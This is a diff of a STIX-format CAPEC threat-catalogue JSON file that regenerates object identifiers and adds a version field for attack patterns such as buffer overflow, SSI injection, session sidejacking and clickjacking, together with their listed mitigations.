"relationship_type": "mitigates", - "target_ref": "attack-pattern--e49b65ac-dfea-4a34-9671-e6a5c64d87b2" + "target_ref": "attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0" }, { "name": "Overflow Buffers", "description": "Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an adversary. As a consequence, an adversary is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the adversaries' choice.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -432,165 +434,166 @@ "Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an adversary not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ec0e6a33-90ad-4350-bc19-434e510a52e8" + "id": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-100-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use a language or compiler that performs automatic bounds checking.", "type": "course-of-action", - "id": "course-of-action--f80bedd2-ad06-4cf0-a5e5-f4fb70c030dd" + "id": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d8fc3bf8-eb9d-4654-a07b-a98d6d662e42", - "source_ref": "course-of-action--f80bedd2-ad06-4cf0-a5e5-f4fb70c030dd", + "id": "relationship--33e09541-7bdb-409c-87ee-c2d5fac60326", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ec0e6a33-90ad-4350-bc19-434e510a52e8" + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-100-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use secure functions not vulnerable to buffer overflow.", "type": "course-of-action", - "id": "course-of-action--93cd07dc-a347-46fa-bb8c-11c020c5e047" + "id": "course-of-action--ac2ade22-d841-404a-8a86-d98f9031ce97" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a8e71b66-0299-4425-97c5-2c1e00b5d194", - "source_ref": "course-of-action--93cd07dc-a347-46fa-bb8c-11c020c5e047", + "id": "relationship--90aa64d8-d944-465e-a4f2-e675c4db1e3d", + "source_ref": "course-of-action--ac2ade22-d841-404a-8a86-d98f9031ce97", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ec0e6a33-90ad-4350-bc19-434e510a52e8" + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-100-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "If you have to use dangerous functions, make sure that you do boundary checking.", "type": "course-of-action", - "id": "course-of-action--649c3e97-9cc3-4a65-bf60-c929e42cf694" + "id": "course-of-action--789de7ca-979f-49ca-9234-1036093a6f0a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a77446b6-629f-4b2a-97ae-c5f32d5f177b", - "source_ref": "course-of-action--649c3e97-9cc3-4a65-bf60-c929e42cf694", + "id": "relationship--54bc9c0c-cf8b-441b-9370-bc490e63abe2", + "source_ref": "course-of-action--789de7ca-979f-49ca-9234-1036093a6f0a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ec0e6a33-90ad-4350-bc19-434e510a52e8" + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-100-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.", "type": "course-of-action", - "id": "course-of-action--7dee5d10-4d7e-4583-873d-8ec182af868a" + "id": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f4b43bef-ac58-428d-9933-c84dd9444a05", - "source_ref": "course-of-action--7dee5d10-4d7e-4583-873d-8ec182af868a", + "id": "relationship--3154d4bf-605f-494e-b940-0922a96cba1e", + "source_ref": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ec0e6a33-90ad-4350-bc19-434e510a52e8" + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-100-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use OS-level preventative functionality. Not a complete solution.", "type": "course-of-action", - "id": "course-of-action--d90f904e-47fc-4260-974a-5c0fa7a418c1" + "id": "course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--96552eda-0d14-4739-aeb7-a534bc2dce34", - "source_ref": "course-of-action--d90f904e-47fc-4260-974a-5c0fa7a418c1", + "id": "relationship--12473cb4-52de-4c12-a0c1-7bbe89797c54", + "source_ref": "course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ec0e6a33-90ad-4350-bc19-434e510a52e8" + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-100-5", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software.", "type": "course-of-action", - "id": "course-of-action--704dd063-9edb-4732-a7c7-eb08dc276a17" + "id": "course-of-action--a0e116b6-ef9d-4fc2-9668-ee7c94b249fe" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--92290227-4cb2-4778-9920-24bc6be0a020", - "source_ref": "course-of-action--704dd063-9edb-4732-a7c7-eb08dc276a17", + "id": "relationship--cbda8fea-6328-4a87-acd6-4f41441bade8", + "source_ref": "course-of-action--a0e116b6-ef9d-4fc2-9668-ee7c94b249fe", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ec0e6a33-90ad-4350-bc19-434e510a52e8" + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5" }, { "name": "Server Side Include (SSI) Injection", "description": "An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -650,90 +653,91 @@ "\n Consider a website hosted on a server that permits Server Side Includes (SSI), such as Apache with the \"Options Includes\" directive enabled.\n Whenever an error occurs, the HTTP Headers along with the entire request are logged, which can then be displayed on a page that allows review of such errors. A malicious user can inject SSI directives in the HTTP Headers of a request designed to create an error.\n When these logs are eventually reviewed, the server parses the SSI directives and executes them.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--5a90e8fa-eff4-44a4-9571-a0f9f0d967d3" + "id": "attack-pattern--83a895c1-df98-4aa4-be2d-ace0108e64be" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-101-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them", "type": "course-of-action", - "id": "course-of-action--2c9f7711-756c-440d-bf63-1656e1de3287" + "id": "course-of-action--44e277ab-ef98-46e0-b905-4280ecfb32e7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b572de35-b235-46f1-b8f4-804ec044de7b", - "source_ref": "course-of-action--2c9f7711-756c-440d-bf63-1656e1de3287", + "id": "relationship--f85f68b6-6f23-4af9-83cd-87d22db28551", + "source_ref": "course-of-action--44e277ab-ef98-46e0-b905-4280ecfb32e7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5a90e8fa-eff4-44a4-9571-a0f9f0d967d3" + "target_ref": "attack-pattern--83a895c1-df98-4aa4-be2d-ace0108e64be" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-101-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive", "type": "course-of-action", - "id": "course-of-action--288536e7-ffbf-4b87-8494-a2dbd5cbf311" + "id": "course-of-action--b738987e-cbcc-4aa9-8bc3-b46daf33e1f0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7c998824-e4ad-46eb-8646-3aa5b99a75db", - "source_ref": "course-of-action--288536e7-ffbf-4b87-8494-a2dbd5cbf311", + "id": "relationship--74c821e2-a381-4185-b011-38540d380f0d", + "source_ref": "course-of-action--b738987e-cbcc-4aa9-8bc3-b46daf33e1f0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5a90e8fa-eff4-44a4-9571-a0f9f0d967d3" + "target_ref": "attack-pattern--83a895c1-df98-4aa4-be2d-ace0108e64be" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-101-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead", "type": "course-of-action", - "id": "course-of-action--6a6a1f5c-bd74-4622-b12d-fd2a1188f8e0" + "id": "course-of-action--2b281151-7e37-44b5-963a-2b376e8e2f26" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4c12a2b3-861f-4057-b3ea-38b80ba37d71", - "source_ref": "course-of-action--6a6a1f5c-bd74-4622-b12d-fd2a1188f8e0", + "id": "relationship--90d7b81d-d132-4a5f-b3d4-40f3cec2c222", + "source_ref": "course-of-action--2b281151-7e37-44b5-963a-2b376e8e2f26", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5a90e8fa-eff4-44a4-9571-a0f9f0d967d3" + "target_ref": "attack-pattern--83a895c1-df98-4aa4-be2d-ace0108e64be" }, { "name": "Session Sidejacking", "description": "Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -806,65 +810,66 @@ "The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, he has a hosted e-mail account open. This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user's session token to the server. The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but his e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim's session token is now flowing unencrypted between the victim's browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim's hosted e-mail account." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--62ada31d-2a50-4fe5-8399-d831010b7841" + "id": "attack-pattern--d1885000-ba17-4c2d-a3ea-1e7bc473fe7a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-102-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.", "type": "course-of-action", - "id": "course-of-action--801acb82-04dd-49de-be9c-eea3896af531" + "id": "course-of-action--06ed9958-72eb-4866-9e5e-9bd8c0b19eaf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--42ac8e16-2fae-4f25-ab1c-5a6a101deb61", - "source_ref": "course-of-action--801acb82-04dd-49de-be9c-eea3896af531", + "id": "relationship--7075ee33-e8e4-4aec-bafa-326134ab7b81", + "source_ref": "course-of-action--06ed9958-72eb-4866-9e5e-9bd8c0b19eaf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--62ada31d-2a50-4fe5-8399-d831010b7841" + "target_ref": "attack-pattern--d1885000-ba17-4c2d-a3ea-1e7bc473fe7a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-102-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks.", "type": "course-of-action", - "id": "course-of-action--782c2d33-ac5f-4669-a102-a298520bb54e" + "id": "course-of-action--7a5656cc-3ca7-4340-8f17-e7f992258b93" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7dc569a4-29eb-4b15-a468-b1bff67157ee", - "source_ref": "course-of-action--782c2d33-ac5f-4669-a102-a298520bb54e", + "id": "relationship--61ec212b-f2a8-4522-a8fe-cf1c6a3a709c", + "source_ref": "course-of-action--7a5656cc-3ca7-4340-8f17-e7f992258b93", "relationship_type": "mitigates", - "target_ref": "attack-pattern--62ada31d-2a50-4fe5-8399-d831010b7841" + "target_ref": "attack-pattern--d1885000-ba17-4c2d-a3ea-1e7bc473fe7a" }, { "name": "Clickjacking", "description": "In a clickjacking attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from a seemingly completely different system. While being logged in to some target system, the victim visits the adversary's malicious site which displays a UI that the victim wishes to interact with. In reality, the clickjacked page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most certainly undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -918,90 +923,91 @@ "\n A victim has an authenticated session with a site that provides an electronic payment service to transfer funds between subscribing members. At the same time, the victim receives an e-mail that appears to come from an online publication to which he or she subscribes with links to today's news articles. The victim clicks on one of these links and is taken to a page with the news story. There is a screen with an advertisement that appears on top of the news article with the 'skip this ad' button. Eager to read the news article, the user clicks on this button. Nothing happens. The user clicks on the button one more time and still nothing happens.\n In reality, the victim activated a hidden action control located in a transparent layer above the 'skip this ad' button. The ad screen blocking the news article made it likely that the victim would click on the 'skip this ad' button. Clicking on the button, actually initiated the transfer of $1000 from the victim's account with an electronic payment service to an adversary's account. Clicking on the 'skip this ad' button the second time (after nothing seemingly happened the first time) confirmed the transfer of funds to the electronic payment service.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--8d1e3286-96d2-4edc-bbcf-9dbce6035dd0" + "id": "attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-103-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", "type": "course-of-action", - "id": "course-of-action--95dfc013-9b59-434d-8cff-1d023083eb96" + "id": "course-of-action--443002d8-3f49-4db7-9712-ddd66f4ebbad" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f0c3bbaf-4c65-4456-83af-87f945face61", - "source_ref": "course-of-action--95dfc013-9b59-434d-8cff-1d023083eb96", + "id": "relationship--6c605c01-c481-4d1d-8aca-559307e5ebb1", + "source_ref": "course-of-action--443002d8-3f49-4db7-9712-ddd66f4ebbad", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8d1e3286-96d2-4edc-bbcf-9dbce6035dd0" + "target_ref": "attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-103-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Turn off JavaScript, Flash and disable CSS.", "type": "course-of-action", - "id": "course-of-action--0c97ae20-4c0e-467b-bdc3-0495e7a08570" + "id": "course-of-action--c22b6204-a5ec-49b8-b8b0-017d26455943" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--0e5c33b2-0741-4c80-851f-6cc178c13434", - "source_ref": "course-of-action--0c97ae20-4c0e-467b-bdc3-0495e7a08570", + "id": "relationship--5492510a-bd3b-4b57-9488-9da352508d9f", + "source_ref": "course-of-action--c22b6204-a5ec-49b8-b8b0-017d26455943", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8d1e3286-96d2-4edc-bbcf-9dbce6035dd0" + "target_ref": "attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-103-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", "type": "course-of-action", - "id": "course-of-action--8fbe0cf2-833c-472f-b479-94bd68f7ce50" + "id": "course-of-action--69eb9c90-2ae5-4bab-aca8-b86865b9f811" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--530bfd63-e6d0-4e54-8d4f-ed6094e753f9", - "source_ref": "course-of-action--8fbe0cf2-833c-472f-b479-94bd68f7ce50", + "id": "relationship--598d9026-5333-4e2a-9077-8a53f6171f24", + "source_ref": "course-of-action--69eb9c90-2ae5-4bab-aca8-b86865b9f811", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8d1e3286-96d2-4edc-bbcf-9dbce6035dd0" + "target_ref": "attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e" }, { "name": "Cross Zone Scripting", "description": "An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from \"Restful Privilege Escalation\" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) 